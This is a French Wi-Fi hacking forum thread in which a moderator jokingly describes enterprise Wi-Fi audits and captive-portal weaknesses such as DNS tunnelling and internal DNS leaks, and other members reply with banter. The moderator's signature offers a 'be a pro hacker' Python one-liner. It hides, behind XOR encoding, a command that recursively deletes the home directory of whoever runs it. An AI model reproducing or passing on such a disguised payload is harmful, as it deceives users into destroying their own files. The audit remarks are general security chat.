Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 12-03-2016 00:49:52

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

Je vais bien ne t'en fais pas

Bonjour à tous.

Ça fait un sacré long moment que je ne suis pas passé par ici, et je me suis dit que je devrais passer vous faire un petit coucou. Sauf que je n'ai rien à vous raconter. Donc je vais inventer des trucs.

Peut-être que je connais des amis qui ont entendu parler des choses suivantes.
L'ensemble de ce post est constitué d'affabulations absurdes sans aucun lien avec la réalité.
Toute ressemblance avec des faits et personnes réelles serait fortuite.

Il paraît que des gens réalisent − entre autres missions − des audits de sécurité de Wi-Fi pour leur travail, et que cela leur permet de gagner de l'argent. Ils en ont de la chance ces gens qui gagnent de l'argent.

Le Wi-Fi dans le milieu professionnel ne ressemblerait pas à ce qu'on trouve chez les rigolos qui configurent leur livebox. Afin de respecter les PSSI d'entreprises, de l'authentification EAP serait utilisée (WPA2-Enterprise). Par exemple, un AP pour contacterait un service radius branché sur l'AD corporate qui va authentifier les utilisateurs avec : des tokens d'authentification Windows (MSCHAPv2) ou des certificats (un certificat par poste).
Les certificats impliquent de se taper de la gestion de parc informatique, des solutions « entreprise » existent, et permettent de gérer tranquillement son parc de clients Wi-Fi.
À ce niveau là, pas de risque à auditer pour les entreprises. WPA2-Enterprise est quelque chose de maîtrisé, et à part quelques détails de configuration des AP qui pourraient divulguer leurs hostnames/ips dans les beacons, rien de bien sérieux.

Les risques potentiels liés au Wi-Fi pourraient avoir été identifiés par des entreprises fictives dans les réseaux non maîtrisés : hotspot mobiles, hotspot « maison » installé dans un bureau, voire rogue AP.
Pour maîtriser ces risques potentiels, peut-être que des entreprises voudraient donner de l'argent à des gens pour effectuer des inventaires de présence sur les ondes. Et peut-être que des choses rigolotes passent sur les ondes.
En plus de Charline le matin sur France Inter, on peut trouver des trucs rigolos sur le 2.4GHz :
- Des réseaux ad-hoc d'imprimantes avec un telnet admin:admin sur le TCP 10000
- Des « smart » devices craignos
- Des réseaux oubliés, installés un jour et laissés en place dans une armoire depuis 6 ans
- Des réseaux mystère, personne ne sait à qui ils sont, il y a peu ou pas de trafic réseau dessus
- Des réseaux ouverts. (oups)
- Des réseaux 20% plus cool


Ça doit être rigolo d'acquérir des captures de paquets pour réaliser ce genre d'audits. Les gens qui font peut-être ça pourraient utiliser une suite d'outils qui ne comprend rien de la suite aircrack :
- tshark (pour sauvegarder les paquets, et pour parser les captures)
- wireshark (pour voir en temps réel des choses)
- ip (parce que ipconfig c'est so 2002)
- iw (parce que iwconfig c'est so 2002)
(Personnellement, je pense que la suite aircrack c'est un truc de kikous pour la capture. Les en-tête radiotap ne sont pas ajoutés (elles contiennent un timestamp, le nom de l'interface de capture, la qualité et le canal))
Si des gens se livrent à ce genre d'activités, peut-être qu'ils doivent retourner leurs captures dans tous les sens pour filtrer le contenu et extraire du limon dégueulasse que représente un gros .pcapng les quelques pépites qui font peur aux responsables de la gestion des risques.

Côté matériel, des amis m'ont dit que la yagi bazooka de wifi highpower fonctionne très bien. On m'a évoqué des choses comme de la triangulation d'AP sur une carte à 100m en extérieur, et de la communication avec des AP en haut de tours de plusieurs étages. (Au moins plus que un. Moins que 200 quand même).

J'ai ouï dire que les portails captifs peuvent faire l'objet d'audits de sécurité. Mais franchement je n'y crois guère.
Selon certaines rumeurs, des entreprises ne configureraient pas très bien les appliances clef en main qu'elles commandent, et se sabordent la sécurité :
- le portail est contournable (tunnel DNS avec iodine par exemple)
- le serveur DNS du portail résoud les reverse-DNS de la zone interne et leake tous les noms de serveurs en 10.*.*.*
- tous les clients sont dans un /24 à plat et peuvent parler entre eux (ou se batteryDoS sur le port TCP iphone-sync)
Ces rumeurs infondées me semblent bien loin de la sécurité des entreprises réelles. En effet, aujourd'hui tout le monde sait configurer une appliance, et même certaines entreprises délèguent cette tâche à des prestataires qui savent ce qu'ils font.

Sinon, moi ça va. Je me suis mis à découper des .exe et je mange équilibré.
La piscine j'ai vite trouvé ça chiant, donc je me suis rabattu sur la course à pied. Je cours un peu de temps à autres pour prendre l'air.
En ce moment, je me couche à 22h30 après une tisane tous les soirs, et je lis des livres en papier.
En fait je suis un putain de vieux.

Et vous, ça va ?


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 14-03-2016 15:14:29

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Je vais bien ne t'en fais pas

Salut, c'est sympa de nous donner quelques news. Et oui, à trop fréquenter Crack-wifi on finit par inventer plein de trucs incroyables sur les systèmes Wifi! Ils en ont de la chance ces gens là dans les histoires que tu inventes pour passer le temps dis donc! Quand tu vas faire ton footing, j'espère que tu prends toujours ton sac à dos rempli de cartes Wifi en monitor (normal quoi)?

spawn a écrit :

En ce moment, je me couche à 22h30 après une tisane tous les soirs, et je lis des livres en papier.

Oui, moi aussi ça m'est arrivé de lire des livres en papier, à l'époque ou mon ordi était tombé en rade. Heureusement, maintenant j'ai des ordis de secours au cas ou!

Si tu n'écoutes pas encore RTL, alors rassures toi tu as encore un peu de marge avant de devenir un vieux wink

Hors Ligne

#3 14-03-2016 19:32:36

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Je vais bien ne t'en fais pas

Il nous manquait le spawn...


Pour la tisane essaye sardines fumées/fraises c'est pas mauvais..

Pour le reste, je rejoins M1ck3y, concernant la chance qu'ont tous ces gens..

Et pis, fais gaffe à decouper des "exe", tu risques de te couper..

Moi j'ai essayé de decouper mon "ex" et j'ai frôlé la cour d'assise!!  lol


Bon sinon, je vois que ca fait toujours autant plaisirs de te lire sur le forum wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#4 14-03-2016 22:37:22

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Je vais bien ne t'en fais pas

Heyyyyyyyyy mister spawn in the galaxy !

  On croyait que la NSA t'avait séquestré... Bon, je vois que ça va... même si tu m'inquiètes un peu avec tes histoires à dormir debout de gens qui font de l'argent avec le wifi.
Et puis les  tisanes, les livres en papier et  france inter... J'espère que tu n'en ai pas au stade mot croisés / question pour un champion parce que là tu vas toucher le fond
Et puis Sophia Aram c'est tout de mème mieux que Charline Vanhoenacker !
Oups, 22h35....
   ... C'est tard, il faut que j’aille me coucher big_smile

biz biz

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Je vous salue bien bas! :-) par mikouworld
2 403 10-02-2016 23:09:26 par M1ck3y
Épinglée :
Épinglée :: Comment bien choisir son antenne Wi-Fi par Skeunk
23 23248 01-01-2016 17:16:42 par lerz
Bien le bonjour ;) par lekmy
4 1071 17-10-2014 01:39:32 par Fuji
5 1417 10-05-2014 20:22:16 par Pmloikju
Bien le bonsoir ^^ par FlyB0t
3 628 29-03-2014 18:34:40 par Furyo

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.038 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]